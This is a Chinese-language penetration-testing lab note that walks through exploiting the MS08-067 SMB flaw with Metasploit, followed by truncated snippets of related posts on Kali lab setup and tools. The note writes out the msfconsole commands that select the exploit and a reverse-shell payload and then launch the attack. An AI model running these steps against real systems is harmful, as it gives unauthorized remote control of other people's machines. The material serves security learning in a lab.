windows服務滲透攻擊實戰——ms08-067安全漏洞
進入msfconsole
search ms08_067
use exploit/windows/smb/ms_08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set targets :注意不能按下圖設定targets,有可能因為msf版本不同,targets編號不同,這裡選擇0,進行系統自動探測。
show options
show targets
設定各必要選項如下:
exploit開始攻擊
成功後,可以進入靶機命令列
漏洞分析:
檢視msf的攻擊的**/usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb
可以發現漏洞檔案是netapi32.dll,在c:\windows\system32\下
動態分析用ollydbg.exe
難。。。。
kali滲透測試與教學筆記的實驗環境
主要參考metasploit魔鬼訓練營 配置需要注意的特別是 閘道器伺服器linux metasploitable有兩個網絡卡,乙個連線dmz區,乙個連線內網,配置如下 開啟 etc sysctl.conf,開啟其中的資料報 功能 找到net.ipv4.ip forward 1語句,把前面的 號去掉...
Kali滲透測試 EtherApe
在對網路資料分析的時候,滲透測試人員往往只關心資料流向以及協議型別,而不關心具體資料報的內容。因為這樣可以快速找到網路的關鍵節點或者重要的協議型別。kali linux提供的etherape可以滿足這個需求。該工具需要使用者使用命令apt get install etherape手動安裝。它支援匯入...
滲透測試筆記 之 配置KALI
dhclient eth0ifconfig eth0 192.168.1.11 24route add default gw 192.168.1.1 netstat na 檢視配置是否生效,destination和genmask都為0.0.0.0的一行是預設閘道器route add net 172....